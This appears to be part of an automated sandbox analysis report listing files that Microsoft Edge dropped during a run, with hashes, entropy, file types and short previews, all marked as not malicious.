                                                                                                                                                                                                                                                                          MD5:B21D8959BB86527AC56E121087DD9DFA
                                                                                                                                                                                                                                                                          SHA1:9F54767619A27DDF7CE092D7F7C76E296B9C3CBE
                                                                                                                                                                                                                                                                          SHA-256:43D1D318376FCB2423A41F9628D10B965DFD97F9244C5A5A033948686996215C
                                                                                                                                                                                                                                                                          SHA-512:E19752D51B081A18ED94438455E108E65C529BF84A36F9768B88F51D2D99771219AD001ADE737C5538403E5D00E43A5F5CF0DD2D993B23CBA02B78A95979DB1A
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:SQLite Write-Ahead Log, version 3007000
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):317272
                                                                                                                                                                                                                                                                          Entropy (8bit):0.8912820820788924
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:384:6uVGmZjFVyl3hRkWvisVoVgfy+41qxv8eyNyb0yDytMyxexyZf:6n0
                                                                                                                                                                                                                                                                          MD5:3E7F4660CC28AA023D4ADE7F19B6D4FB
                                                                                                                                                                                                                                                                          SHA1:9D22B9E001F76A904EF489D4777E3E918AB62563
                                                                                                                                                                                                                                                                          SHA-256:CBCE8F8C16F379D4EAEBB3A00D3EAA25FE995CBA1E7E1F8D6EEACDD456F9E7BA
                                                                                                                                                                                                                                                                          SHA-512:EB561BC6E42D1EDCA5357F9EACC804D763E6E0671E3D6DD7E17DBF54D1697C549960F9BF58786BCC9D12F767FEC17CE5A7EB80C3E975B5576C860792915B719A
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):419
                                                                                                                                                                                                                                                                          Entropy (8bit):3.6926851822774145
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:6:/XntM+dll3sedhO38WrOuuuuuuuuuuuuAysedhOJUn:lllc8zWrOuuuuuuuuuuuuA/8Xn
                                                                                                                                                                                                                                                                          MD5:E96DBD4DE314E028B5700346610687EB
                                                                                                                                                                                                                                                                          SHA1:593E5426E8590A8A06075ACFDADAC24F58009248
                                                                                                                                                                                                                                                                          SHA-256:AA95319C89CB029096E37DEE5DC5E32E39076548C24A6E7377E8D5DCB7B88BF3
                                                                                                                                                                                                                                                                          SHA-512:F737650A5D6B58B9EABD7F25D9EEC561F65781AA4BF98E7432A7AA7DB0D9B60FAEC610B9DFFC8AD2E672CC27EC744BD22F000F339F86241BBC27C10030B9094E
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):324
                                                                                                                                                                                                                                                                          Entropy (8bit):5.224629057451849
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:6:iOrv4MFUst+q2PCHhJ23oH+TcwtfrK+IFUtJv4OFZZmwPv4OFNVkwOCHhJ23oH+t:7sMFIvBYeb23FUtqA/Yo56Yeb3J
                                                                                                                                                                                                                                                                          MD5:3182AEF125E4E63161D1F9FC587FE8AB
                                                                                                                                                                                                                                                                          SHA1:A0A29E7ED3EBFB7A2F7F0B86A1E382CE2DC2999F
                                                                                                                                                                                                                                                                          SHA-256:33B13EF8B60E3F4C17637EA279A75A8B9F0A36A1236A60BE111AF6BAACE4BB5E
                                                                                                                                                                                                                                                                          SHA-512:7C148B085014EBDA93A92A0D4821E03A01A5F788F2F9ED28EADDDDAAAB45731C51C8C1052274F1512A8CC9A6257ED9CB1AF20744EB193E74435DACEC54FB98CE
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:2025/01/09-08:55:36.360 10c8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.2025/01/09-08:55:36.362 10c8 Recovering log #3.2025/01/09-08:55:36.362 10c8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/000003.log .
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):753
                                                                                                                                                                                                                                                                          Entropy (8bit):4.037333775091125
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:12:G0nYUtTNop//z3p/Uz0RuWlJhC+lvBavRtin01zvZDEtlkyBrgxvBs:G0nYUtypD3RUovhC+lvBOL+t3IvBs
                                                                                                                                                                                                                                                                          MD5:C5675C35B320A0898802E1ECFD3476E8
                                                                                                                                                                                                                                                                          SHA1:B6CA1C2EE1340662A7B495778416988006748327
                                                                                                                                                                                                                                                                          SHA-256:8E60BB9B60A9A242D016CF5425FF3D76A94911F197B3E4AB08A417E39C2832A5
                                                                                                                                                                                                                                                                          SHA-512:DAA3E9FADF4F69A88600460F48116E50BCE1C979E4AFA7114D1B8CCEC6626520CC3725D0BB845E0FCC8587A8690D4AC495C138AB1AAC2981CAEB9C485FA0CC67
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):342
                                                                                                                                                                                                                                                                          Entropy (8bit):5.212655043460406
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:6:iOrv4zN+q2PCHhJ23oH+TcwtfrzAdIFUtJv4GZmwPv4CVkwOCHhJ23oH+Tcwtfrm:7skvBYeb9FUtqG/Y656Yeb2J
                                                                                                                                                                                                                                                                          MD5:F9693B3805E9E9EC42793D5185674983
                                                                                                                                                                                                                                                                          SHA1:6F10FF6AE9A9A14D8D150809376A00FF47769DF2
                                                                                                                                                                                                                                                                          SHA-256:303C88EDE2B40ADD840C7EFE8D1CD4D24942F74DCB4F3B2FCF3520E806184F65
                                                                                                                                                                                                                                                                          SHA-512:9CBC2A55D9BA39AB7119CE97A80EF609B41EB95ABCC62B006D55B4486AEDF5AF7475D265AD9027569B782931A0696302B75A486275A5BD229650A4EC407E7805
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:2025/01/09-08:55:36.354 10c8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2025/01/09-08:55:36.355 10c8 Recovering log #3.2025/01/09-08:55:36.355 10c8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/000003.log .
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):120
                                                                                                                                                                                                                                                                          Entropy (8bit):3.32524464792714
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3:tbloIlrJFlXnpQoWcNylRjlgbYnPdJiG6R7lZAUAl:tbdlrYoWcV0n1IGi7kBl
                                                                                                                                                                                                                                                                          MD5:A397E5983D4A1619E36143B4D804B870
                                                                                                                                                                                                                                                                          SHA1:AA135A8CC2469CFD1EF2D7955F027D95BE5DFBD4
                                                                                                                                                                                                                                                                          SHA-256:9C70F766D3B84FC2BB298EFA37CC9191F28BEC336329CC11468CFADBC3B137F4
                                                                                                                                                                                                                                                                          SHA-512:4159EA654152D2810C95648694DD71957C84EA825FCCA87B36F7E3282A72B30EF741805C610C5FA847CA186E34BDE9C289AAA7B6931C5B257F1D11255CD2A816
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.\.A.p.p.l.i.c.a.t.i.o.n.\.m.s.e.d.g.e...e.x.e.
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):13
                                                                                                                                                                                                                                                                          Entropy (8bit):2.7192945256669794
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3:NYLFRQI:ap2I
                                                                                                                                                                                                                                                                          MD5:BF16C04B916ACE92DB941EBB1AF3CB18
                                                                                                                                                                                                                                                                          SHA1:FA8DAEAE881F91F61EE0EE21BE5156255429AA8A
                                                                                                                                                                                                                                                                          SHA-256:7FC23C9028A316EC0AC25B09B5B0D61A1D21E58DFCF84C2A5F5B529129729098
                                                                                                                                                                                                                                                                          SHA-512:F0B7DF5517596B38D57C57B5777E008D6229AB5B1841BBE74602C77EEA2252BF644B8650C7642BD466213F62E15CC7AB5A95B28E26D3907260ED1B96A74B65FB
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:117.0.2045.47
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):44170
                                                                                                                                                                                                                                                                          Entropy (8bit):6.090538788133146
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kgCLmZt+tR96hOxq4gFkFDlwWE7RTupzKscDX//NPCh:z/Ps+wsI7ynxtGhOxqQoRTuiVIos
                                                                                                                                                                                                                                                                          MD5:34043B0C78EB2698EC87042AA0C7549B
                                                                                                                                                                                                                                                                          SHA1:251A05BC7E12413AB3CCA7A62E40352242ABC56C
                                                                                                                                                                                                                                                                          SHA-256:051568528CBA91CEFBC3E556D42DB5A5E047D5B56C7B5C1005161A8CC898F608
                                                                                                                                                                                                                                                                          SHA-512:92FF0791D1CF6299FCDEC2BDAE3E0F1BCA2B101D4BA2DAFB79AA576E516D4D024C4D0F53AEF5734B9ED0393AE7333C948E253C183C4D32DDEA02483D8BAC573A
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"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
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):44170
                                                                                                                                                                                                                                                                          Entropy (8bit):6.090538788133146
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kgCLmZt+tR96hOxq4gFkFDlwWE7RTupzKscDX//NPCh:z/Ps+wsI7ynxtGhOxqQoRTuiVIos
                                                                                                                                                                                                                                                                          MD5:34043B0C78EB2698EC87042AA0C7549B
                                                                                                                                                                                                                                                                          SHA1:251A05BC7E12413AB3CCA7A62E40352242ABC56C
                                                                                                                                                                                                                                                                          SHA-256:051568528CBA91CEFBC3E556D42DB5A5E047D5B56C7B5C1005161A8CC898F608
                                                                                                                                                                                                                                                                          SHA-512:92FF0791D1CF6299FCDEC2BDAE3E0F1BCA2B101D4BA2DAFB79AA576E516D4D024C4D0F53AEF5734B9ED0393AE7333C948E253C183C4D32DDEA02483D8BAC573A
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 6
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):20480
                                                                                                                                                                                                                                                                          Entropy (8bit):0.6773696719930975
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:12:TLpUAFUxOUDaabZXiDiIF8izX4fhhdWeci2oesJaYi3islRud6zcQAJmdngzQdoO:TLiOUOq0afDdWec9sJhOs3fsuZ7J5fc
                                                                                                                                                                                                                                                                          MD5:6FFCCB198DC6B17E165460E6E246B03C
                                                                                                                                                                                                                                                                          SHA1:014A46B0E6E84089E1C20FA232F54CA737D5F023
                                                                                                                                                                                                                                                                          SHA-256:D1B2EC8C9906C3418837FFB8E116AA59C026DE2D67B2AFDA956F14D0DC3851AF
                                                                                                                                                                                                                                                                          SHA-512:846AE3D0A49A14BF82203A0FEDAD6E794F7E68C22A40EE0E014FEA99DFC676FAE4AFEB2C56F324E4361E83A35458C63E2ABAA7B28B6D23B20FA29EF47CBE87B3
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:SQLite format 3
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):47
                                                                                                                                                                                                                                                                          Entropy (8bit):4.3818353308528755
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3:2jRo6jhM6ceYcUtS2djIn:5I2uxUt5Mn
                                                                                                                                                                                                                                                                          MD5:48324111147DECC23AC222A361873FC5
                                                                                                                                                                                                                                                                          SHA1:0DF8B2267ABBDBD11C422D23338262E3131A4223
                                                                                                                                                                                                                                                                          SHA-256:D8D672F953E823063955BD9981532FC3453800C2E74C0CC3653D091088ABD3B3
                                                                                                                                                                                                                                                                          SHA-512:E3B5DB7BA5E4E3DE3741F53D91B6B61D6EB9ECC8F4C07B6AE1C2293517F331B716114BAB41D7935888A266F7EBDA6FABA90023EFFEC850A929986053853F1E02
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:customSettings_F95BA787499AB4FA9EFFF472CE383A14
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):35
                                                                                                                                                                                                                                                                          Entropy (8bit):4.014438730983427
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3:YDMGA2ADH/AYKEqsYq:YQXT/bKE1F
                                                                                                                                                                                                                                                                          MD5:BB57A76019EADEDC27F04EB2FB1F1841
                                                                                                                                                                                                                                                                          SHA1:8B41A1B995D45B7A74A365B6B1F1F21F72F86760
                                                                                                                                                                                                                                                                          SHA-256:2BAE8302F9BD2D87AE26ACF692663DF1639B8E2068157451DA4773BD8BD30A2B
                                                                                                                                                                                                                                                                          SHA-512:A455D7F8E0BE9A27CFB7BE8FE0B0E722B35B4C8F206CAD99064473F15700023D5995CC2C4FAFDB8FBB50F0BAB3EC8B241E9A512C0766AAAE1A86C3472C589FFD
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{"forceServiceDetermination":false}
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):81
                                                                                                                                                                                                                                                                          Entropy (8bit):4.3439888556902035
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3:kDnaV6bVsFUIMf1HDOWg3djTHXoSWDSQ97P:kDYaoUIe1HDM3oskP
                                                                                                                                                                                                                                                                          MD5:177F4D75F4FEE84EF08C507C3476C0D2
                                                                                                                                                                                                                                                                          SHA1:08E17AEB4D4066AC034207420F1F73DD8BE3FAA0
                                                                                                                                                                                                                                                                          SHA-256:21EE7A30C2409E0041CDA6C04EEE72688EB92FE995DC94487FF93AD32BD8F849
                                                                                                                                                                                                                                                                          SHA-512:94FC142B3CC4844BF2C0A72BCE57363C554356C799F6E581AA3012E48375F02ABD820076A8C2902A3C6BE6AC4D8FA8D4F010D4FF261327E878AF5E5EE31038FB
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):130439
                                                                                                                                                                                                                                                                          Entropy (8bit):3.80180718117079
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:1536:RlIyFAMrwvaGbyLWzDr6PDofI8vsUnPRLz+PMh:weWGP7Eh
                                                                                                                                                                                                                                                                          MD5:EB75CEFFE37E6DF9C171EE8380439EDA
                                                                                                                                                                                                                                                                          SHA1:F00119BA869133D64E4F7F0181161BD47968FA23
                                                                                                                                                                                                                                                                          SHA-256:48B11410DC937A1723BF4C5AD33ECDB286D8EC69544241BC373F753E64B396C1
                                                                                                                                                                                                                                                                          SHA-512:044C5113D877CE2E3B42CF07670620937ED7BE2D8B3BF2BAB085C43EF4F64598A7AC56328DDBBE7F0F3CFB9EA49D38CA332BB4ECBFEDBE24AE53B14334A30C8E
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{.. "geoidMaps": {.. "au": "https://australia.smartscreen.microsoft.com/",.. "ch": "https://switzerland.smartscreen.microsoft.com/",.. "eu": "https://europe.smartscreen.microsoft.com/",.. "ffl4": "https://unitedstates1.ss.wd.microsoft.us/",.. "ffl4mod": "https://unitedstates4.ss.wd.microsoft.us/",.. "ffl5": "https://unitedstates2.ss.wd.microsoft.us/",.. "in": "https://india.smartscreen.microsoft.com/",.. "test": "https://eu-9.smartscreen.microsoft.com/",.. "uk": "https://unitedkingdom.smartscreen.microsoft.com/",.. "us": "https://unitedstates.smartscreen.microsoft.com/",.. "gw_au": "https://australia.smartscreen.microsoft.com/",.. "gw_ch": "https://switzerland.smartscreen.microsoft.com/",.. "gw_eu": "https://europe.smartscreen.microsoft.com/",.. "gw_ffl4": "https://unitedstates1.ss.wd.microsoft.us/",.. "gw_ffl4mod": "https://unitedstates4.ss.wd.microsoft.us/",.. "gw_ffl5": "https://unitedstates2.ss.wd.microsoft.us/",.. "gw_in": "https
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):40
                                                                                                                                                                                                                                                                          Entropy (8bit):4.346439344671015
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3:kfKbUPVXXMVQX:kygV5
                                                                                                                                                                                                                                                                          MD5:6A3A60A3F78299444AACAA89710A64B6
                                                                                                                                                                                                                                                                          SHA1:2A052BF5CF54F980475085EEF459D94C3CE5EF55
                                                                                                                                                                                                                                                                          SHA-256:61597278D681774EFD8EB92F5836EB6362975A74CEF807CE548E50A7EC38E11F
                                                                                                                                                                                                                                                                          SHA-512:C5D0419869A43D712B29A5A11DC590690B5876D1D95C1F1380C2F773CA0CB07B173474EE16FE66A6AF633B04CC84E58924A62F00DCC171B2656D554864BF57A4
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:synchronousLookupUris_638343870221005468
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):57
                                                                                                                                                                                                                                                                          Entropy (8bit):4.556488479039065
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3:GSCIPPlzYxi21goD:bCWBYx99D
                                                                                                                                                                                                                                                                          MD5:3A05EAEA94307F8C57BAC69C3DF64E59
                                                                                                                                                                                                                                                                          SHA1:9B852B902B72B9D5F7B9158E306E1A2C5F6112C8
                                                                                                                                                                                                                                                                          SHA-256:A8EF112DF7DAD4B09AAA48C3E53272A2EEC139E86590FD80E2B7CBD23D14C09E
                                                                                                                                                                                                                                                                          SHA-512:6080AEF2339031FAFDCFB00D3179285E09B707A846FD2EA03921467DF5930B3F9C629D37400D625A8571B900BC46021047770BAC238F6BAC544B48FB3D522FB0
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:9.......murmur3.............,M.h...Z...8.\..<&Li.H..[.?m
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):29
                                                                                                                                                                                                                                                                          Entropy (8bit):4.030394788231021
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3:0xXeZUSXkcVn:0Re5kcV
                                                                                                                                                                                                                                                                          MD5:52E2839549E67CE774547C9F07740500
                                                                                                                                                                                                                                                                          SHA1:B172E16D7756483DF0CA0A8D4F7640DD5D557201
                                                                                                                                                                                                                                                                          SHA-256:F81B7B9CE24F5A2B94182E817037B5F1089DC764BC7E55A9B0A6227A7E121F32
                                                                                                                                                                                                                                                                          SHA-512:D80E7351E4D83463255C002D3FDCE7E5274177C24C4C728D7B7932D0BE3EBCFEB68E1E65697ED5E162E1B423BB8CDFA0864981C4B466D6AD8B5E724D84B4203B
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:topTraffic_638004170464094982
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):575056
                                                                                                                                                                                                                                                                          Entropy (8bit):7.999649474060713
                                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                                          SSDEEP:12288:fXdhUG0PlM/EXEBQlbk19RrH76Im4u8C1jJodha:Ji80e9Rb7Tm4u8CnR
                                                                                                                                                                                                                                                                          MD5:BE5D1A12C1644421F877787F8E76642D
                                                                                                                                                                                                                                                                          SHA1:06C46A95B4BD5E145E015FA7E358A2D1AC52C809
                                                                                                                                                                                                                                                                          SHA-256:C1CE928FBEF4EF5A4207ABAFD9AB6382CC29D11DDECC215314B0522749EF6A5A
                                                                                                                                                                                                                                                                          SHA-512:FD5B100E2F192164B77F4140ADF6DE0322F34D7B6F0CF14AED91BACAB18BB8F195F161F7CF8FB10651122A598CE474AC4DC39EDF47B6A85C90C854C2A3170960
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:raw G3 (Group 3) FAX, byte-padded
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):460992
                                                                                                                                                                                                                                                                          Entropy (8bit):7.999625908035124
                                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                                          SSDEEP:12288:KaRwcD8XXTZGZJHXBjOVX3xFttENr4+3eGPnKvJWXrydqb:KaR5oZ2MBFt8r4+3eG/URdqb
                                                                                                                                                                                                                                                                          MD5:E9C502DB957CDB977E7F5745B34C32E6
                                                                                                                                                                                                                                                                          SHA1:DBD72B0D3F46FA35A9FE2527C25271AEC08E3933
                                                                                                                                                                                                                                                                          SHA-256:5A6B49358772DB0B5C682575F02E8630083568542B984D6D00727740506569D4
                                                                                                                                                                                                                                                                          SHA-512:B846E682427CF144A440619258F5AA5C94CAEE7612127A60E4BD3C712F8FF614DA232D9A488E27FC2B0D53FD6ACF05409958AEA3B21EA2C1127821BD8E87A5CA
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):9
                                                                                                                                                                                                                                                                          Entropy (8bit):3.169925001442312
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3:CMzOn:CM6
                                                                                                                                                                                                                                                                          MD5:B6F7A6B03164D4BF8E3531A5CF721D30
                                                                                                                                                                                                                                                                          SHA1:A2134120D4712C7C629CDCEEF9DE6D6E48CA13FA
                                                                                                                                                                                                                                                                          SHA-256:3D6F3F8F1456D7CE78DD9DFA8187318B38E731A658E513F561EE178766E74D39
                                                                                                                                                                                                                                                                          SHA-512:4B473F45A5D45D420483EA1D9E93047794884F26781BBFE5370A554D260E80AD462E7EEB74D16025774935C3A80CBB2FD1293941EE3D7B64045B791B365F2B63
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:uriCache_
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):179
                                                                                                                                                                                                                                                                          Entropy (8bit):5.0315676499554405
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3:YTyLSmafBoTfIeRDHtDozRLuLgfGBkGAeekVy8HfzXNPIAclTIBeYVn:YWLSGTt1o9LuLgfGBPAzkVj/T8lUZV
                                                                                                                                                                                                                                                                          MD5:8930E3B54842F242422FF4040C08DF49
                                                                                                                                                                                                                                                                          SHA1:E3EF525954C3D1BEB0C3761D7ED9AADE318F6353
                                                                                                                                                                                                                                                                          SHA-256:F959CF6242423F16A8D77DAFC267666165BAF2F186BC48E9DF001A65557EF3D1
                                                                                                                                                                                                                                                                          SHA-512:66765920D730D256A901A9D5D274DABA0BE2A49682E7A5E49DD24D3945E8CDFB81020DD7B548057FA77FB36028A9E103081894C846A1C92AD0B4CA896B3AA79C
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{"version":1,"cache_data":[{"file_hash":"da2d278eafa98c1f","server_context":"1;f94c025f-7523-6972-b613-ce2c246c55ce;unkn:100;0.01","result":1,"expiration_time":1736531739348476}]}
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
